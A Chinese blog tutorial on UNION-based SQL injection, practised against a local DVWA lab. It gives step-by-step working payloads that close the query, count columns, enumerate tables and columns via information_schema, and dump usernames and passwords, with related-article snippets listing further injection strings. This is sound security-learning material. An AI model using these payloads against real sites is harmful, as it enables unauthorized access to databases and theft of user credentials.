sql[union]注入学习

最新推荐文章于 2024-07-16 14:51:49 发布
最新推荐文章于 2024-07-16 14:51:49 发布
阅读量2.3k 收藏 11
点赞数 9
文章标签: SQL注入 union查询 数据库安全 DVWA 信息泄露
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/F1or_/article/details/120700899
版权

所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

union注入是一种常见的sql注入类型,通过闭合sql语句来达到union查询。

union注入的前提是页面上必须要有显示位,在一个网站上,服务端执行了sql语句查询了数据库中的的数据,客户端并展示在这个页面中,这个数据我们看到的位置就叫显示位。、

union注入依据下列几个步骤:
1:判断闭合
2:判断列数
3:判断查询显示位
4:获取数据库名
5:获取表名
6:获取字段名
7:查询字段的数据

这里使用本地环境DVWA
在这里插入图片描述
输入1执行正常查询功能

0x00 判断闭合

输入1',出现报错在这里插入图片描述
输入1'#,不报错 /这里的#是sql语句中的注释符号,将原本sql语句符号进行注释/
在这里插入图片描述

原本sql语句可能是

select First name,Surname fron users where ID='1'

输入1’#后实现构造闭合

select First name,Surname fron users where ID='1'#'

0x01 判断列数

这里判断列数使用order by
order by 函数 是对mysql中查询的结果按照指定字段名排序,也可以指定字段的栏位来排序。

输入1' order by 2#正常回显
在这里插入图片描述
输入1' order by 3#报错,表示只有两列
在这里插入图片描述
本地数据库中可以看到
在这里插入图片描述

在这里插入图片描述

0x02 判断查询显示位

如果没有显示位,就无法通过union注入得到数据库中消息

输入-1' union select 1,2#当前面这一个数在数据库中不存在的时候就会只执行后面union查询
在这里插入图片描述
判断出显示位有两个,都可以进行使用。

0x03 获取数据库名

接下来就是一个比较简单的sql语句应用

-1' union select user(),database()#

在这里插入图片描述

0x04 获取表名

-1' union select 1, group_concat(table_name) from information_schema.tables where table_schema ='dvwa' #

在这里插入图片描述
这里使用group_concat()函数,将所查询到的表面连接起来

0x05 获取字段名

-1' union select 1,group_concat(column_name) from information_schema.columns where table_name = 'users'#

在这里插入图片描述

0x06 查询字段的数据

-1' union select 1,group_concat(password,user) from users#

在这里插入图片描述
这里就得到了用户数据。

F1or
关注
  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
23-5 绕过去除 union 和 select 的 SQL 注入
weixin_43263566的博客
02-07 894
MySQL中,默认情况下,数据库名、表名在Unix、Linux系统上是区分大小写的,而在Windows系统上则不区分大小写。但是,SQL语句中的关键字(如SELECT、INSERT)、函数名(如MAX()、COUNT())以及列名和别名通常是不区分大小写的。但是,对于字符串值的比较,默认是区分大小写的。下面,我将简要介绍一些MySQL的基础知识,以及您提到的一些特殊编码和替换技巧。在某些安全性较低的应用场景中,攻击者可能会尝试通过改变查询语句的格式来绕过安全过滤器,执行SQL注入等恶意操作。
《WEB安全渗透测试》(1)SQL注入实战:union注入
午夜安全
09-30 9635
《WEB安全渗透测试》(1)SQL注入实战:union注入 1)判断是否存在注入URL:http://www.tianchi.com/web/union.php?id=1URL:http://www.tianchi.com/web/union.php?id=1'URL:http://www.tianchi.com/web/union.php?id=1 and 1=1URL:http://www.tianchi.com/web/union.php?id=1 and 1=2发现可能存在SQL注入漏洞。.....
sql注入——union联合注入
hintll的博客
06-22 1018
sql注入——union联合注入 union注入sql注入的一大类型 在做有关sql联合注入时一般用以下思路进行解题: 1.首先要找到能与数据库交互的注入点: 2.测试字段的数量,判断SQL语句查询的列数: 在这里我们使用的命理是order by 通常构造:?id=1’ order by sum–+ 和 1’ order by sum# 这里的sum指代的是数字从1开始逐个测试直至3回显有报错为止: ?id=1’ order by 1–+ ?id=1’ order by 2–+ ?id=1’ orde
SQL注入语法类型——Union联合查询
weixin_30575309的博客
07-15 523
转载于:https://www.cnblogs.com/blogs-1024/p/11191683.html
SQL注入union联合注入的详解
最新发布
m0_57836225的博客
07-16 240
当应用程序在构建 SQL 查询时,将用户输入未经充分验证和清理就直接拼接到查询语句中,如果原始查询语句预期返回一个结果集,而攻击者通过构造恶意的输入,利用 UNION 操作符添加额外的查询部分,就能够将其他原本不应出现在当前查询中的数据合并到结果集中,从而达到获取敏感数据或执行未授权操作的目的。2. 确定字段数量:通过尝试不同数量的列,观察服务器的响应,以确定原始查询中选择的字段数量,以便在注入UNION 查询中提供相同数量的列。// 模拟用户输入,此处存在漏洞。
sql注入--2union注入
技术骨干小李的博客
07-14 296
union注入的初步认识
挖洞入门_unionSQL注入
c4y345的博客
06-21 936
简介:在漏洞盒子挖洞已经有一段时间了,虽说还不是大佬,但技术也有所进步,安全行业就是这样,只有自己动手去做,才能将理论的知识变为个人的经验。本篇文章打算分享一下我在挖显错型SQL注入漏洞过程中的一些个人理解,如有不足也请大佬不吝指教。 0x00:什么是SQL注入 SQL注入,相信大多数人一开始接触安全,听说的第一种漏洞类型就会是SQL注入,众所周知,其本质就是将用户输入的数据当成了SQL语句来执行。 开发过网站的朋友应该都清楚,大多数的小型企业或个人的站点大都采用了LAMP结构,即Linux + Apach
SQL注入union查询ntext数据类型
海阔天空 不再犹豫 谁共我闯荡
10-24 1545
在我们进行sql注入的过程中常常会用到union查询方法,大多数情况下使用union查询法可以让我们很快的知道目标的数据组织方式。    在我们进行sql注入的过程中常常会用到union查询方法,大多数情况下使用union查询法可以让我们很快的知道目标的数据组织方式。然而当我们遇到ntext、text或image数据类型时,union查询就不太管用了。以sql server为例,在这种情况下会抛
SQL注入基础 union(一)
hunter_76的博客
09-02 102
Mysql为例: 需要记住几个函数 database() version() user() 内联注释 index.php?id=-15 /*!union*/ /*!select/ 1,2,3 注意:SQL语句中可以尝试空格代替“+”,或“+”代替空格 例如: index.php?id=1 and 1=2 index.php?id=1+and+1=2 数字型 union注入 id = 1 and 1=1 //网页正常 id = 1 and 1=2 //网页不正常 order b
第三天sql注入基础&UNION注入
代码审计
03-04 500
联合查询注入 SQL注入Sql Injection ) 是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击(有可利用的参数点),这些参数传递给后台的SQL数据库加以解析并执行。(有可以控制的利用点),我们可以通过构造特定的结构,让mysql 或者其他的数据库执行我们想要的操作 哪里存在SQL注入? GET POST HTTP头部注入 Cookie注入 任何客户端可控,传递到服务器的变量。 并且和数据库进行交互,都有可能存在sql注入 在知道查询语句.
超级SQL注入工具,支持布尔盲注,报错盲注,union注入
03-27
超级SQL注入工具目前支持Bool型盲注、错误显示注入Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册 DB2数据库SQL注入手册是指在使用DB2数据库时,如何检测和防止SQL注入攻击的一份指南。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中 inject恶意SQL代码来访问或控制...
Union注入
shenzhang7331的博客
11-18 216
1.http://*id=31 order by 6 注:若6页面正常,7页面不正常,说明有6个字段 2.http://*id=31 and 1=2 union select 1,2,3,4,5,6 注:定位报错字段,若页面显示3 3.http://*id=31 and 1=2 union select 1,2,database(),4,5,6 from information_sch...
SQL显错(union注入基础深度剖析(原理)
m0_46304840的博客
03-03 2438
前言 前面基础应该写的差不多了,至于关于编程语言我会后面再写 正文 什么是sql注入sql注入 指 web应用程序没有对用户输入的数据进行判断,导致前端传入后端的参数 可以被攻击者所控制,并且带入数据库执行 $sql = "SELECT * FROM users where id = $GET['id']"; 因为这里的参数,id可以可以控制,所以会被攻击者进行拼接...
使用Union语句进行SQL注入的基本原理
weixin_44840696的博客
04-01 3759
使用Union语句进行SQL注入的基本原理 SQL注入是常见的网络攻击方法,之所以能够实现,是因为网页有着SQL漏洞。那么什么是SQL漏洞呢,理解SQL注入以及SQL漏洞就要从注入的基本概念和原理说起,Union联合注入SQL注入的一种方式,如果存在漏洞时可以利用这种方法获取我们想要的各种信息,以下从个人角度简要的对注入概念和原理进行解释。 1. 对SQL注入的理解 所谓的SQL注入,是利...
union注入之字符型注入和数值型注入
ws1813004226的博客
05-12 729
什么是SQL注入SQL注入就是web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带进数据库查询,攻击者可以通过构造不同的SQL语句实现对数据库的任意操作。 字符型注入 判断方法:当输入的参数类型为字符型时,数据库执行的查询语句为:select * from users where id=‘x’,我们可以使用’1’=‘1和’1’=‘2判断是否存在SQL注入。 url 地址中输入 http://xxx/abc.php?id= x’ and ‘1’=‘1 页面运行正常,继
SQL注入的几种基本类型
破博客
12-29 9568
SQL注入原理 Web应用程序对于用户输入的数据和合法性没有严谨的判断,前端用户的输入直接传输给后端,攻击者通过构造不同的参数,形成不同的SQL语句来实现对数据库的任意操作。 SQL注入产生需要满足两个条件: 参数用户可控:前端传给后端的参数内容是用户可以控制的 参数带入数据库查询:传入的参数直接拼接到SQL语句,且带入数据库查询 开发者应该秉持一种:外部参数皆不可信的原则,来进行开发。 相关...
sql手工注入 union
09-17
具体地说,当应用程序存在SQL注入漏洞时,攻击者可以构造一个恶意的union查询来获取额外的信息。首先,攻击者需要确定目标查询中的字段数量。可以通过使用order by语句来猜测字段数量,直到页面回显异常为止。一旦...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值